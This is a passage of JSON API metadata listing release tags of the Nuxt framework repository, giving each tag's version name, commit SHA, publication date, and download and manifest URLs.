ub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"